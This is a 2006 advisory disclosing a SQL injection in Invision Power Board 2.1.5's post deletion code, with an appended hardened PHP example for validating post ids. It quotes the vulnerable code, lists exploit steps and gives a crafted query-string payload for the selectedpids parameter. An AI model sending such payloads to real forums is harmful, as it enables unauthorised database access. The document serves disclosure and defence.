Invision Power Board v2.1.5 Remote SQL Injection Apr 28 2006 08:21AM
o y 6 hotmail com
Invision Power Board v2.1.5 Remote SQL Injection

Filename :- func_mod.php

Function name :- post_delete()

Lines :- 89 To 209

Bug Found By :- Devil-00

Greetz :-

Rock Master ^ Hackers Pal ^ n0m4rcy ^

www.securtygurus.net

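[CODE]
if ( is_array( $id ) )
{
    if ( count($id) > 0 )
    {
        // Array elements are joined into the clause without any integer check
        $pid = " IN(".implode(",",$id).")";
    }
    else
    {
        return FALSE;
    }
}
else
{
    // Scalar ids are tested with intval() before use
    if ( intval($id) )
    {
        $pid = "=$id";
    }
    else
    {
        return FALSE;
    }
}
[/CODE]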

When $id is an array, the code doesn't check its elements with intval():

[CODE]
if ( count($id) > 0 )
{
    $pid = " IN(".implode(",",$id).")";
}
[/CODE]

Then we can do SQL injection here >>

[CODE]
$this->ipsclass->DB->simple_construct( array( 'select' => 'pid, topic_id', 'from' => 'posts', 'where' => 'pid'.$pid ) );
[/CODE]

And here >>

[CODE]
$this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 'attachments', 'where' => "attach_pid".$pid ) );
[/CODE]

Because we have 2 queries on different tables with a different number of columns, we can't use UNION to exploit it :( Bad :(

Example exploit:

1- First add 2 posts

2- Check them for deletion

3- Edit the query string with HTTPLiveHeader

[CODE]
act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION SELECT 1,3/*&tact=delete
[/CODE]
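A hardened way to build the $pid fragment that post_delete() appends to both queries, shown as an added example: this is not code from the advisory or from Invision Power Board, and not the vendor's fix. The helper names clean_post_id() and build_pid_clause() are hypothetical, and the sample inputs are constructed (the second is the selectedpids value quoted above).

```php
<?php
// Added example: hypothetical helpers, not Invision Power Board code.

/** Return a positive integer post id, or false if $value is not purely digits. */
function clean_post_id($value)
{
    // Only ints and strings are candidates; nested arrays, bools, etc. are rejected.
    if (!is_int($value) && !is_string($value)) {
        return false;
    }
    // ctype_digit() rejects signs, spaces, quotes, parentheses and comment markers,
    // so "-1) UNION SELECT 1,3/*" fails here instead of being truncated to -1.
    if (!ctype_digit((string) $value)) {
        return false;
    }
    $n = intval($value);
    return $n > 0 ? $n : false;
}

/** Build the fragment appended to 'pid' / 'attach_pid', or false on any bad id. */
function build_pid_clause($id)
{
    if (!is_array($id)) {
        $n = clean_post_id($id);
        // Interpolate the validated integer, never the raw $id.
        return $n === false ? false : '=' . $n;
    }
    $clean = array();
    foreach ($id as $value) {
        $n = clean_post_id($value);
        if ($n === false) {
            return false; // reject the whole request rather than dropping bad ids
        }
        $clean[$n] = $n; // keyed by value to de-duplicate
    }
    return count($clean) > 0 ? ' IN(' . implode(',', $clean) . ')' : false;
}

// Constructed inputs: two valid ids, the selectedpids value from the advisory, a scalar id.
$samples = array(
    array('12', '15'),
    array('-1) UNION SELECT 1,3/*'),
    7,
);
foreach ($samples as $sample) {
    var_dump(build_pid_clause($sample));
}
```

Because the validated fragment is built once, the same check covers both the posts query and the attachments query.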
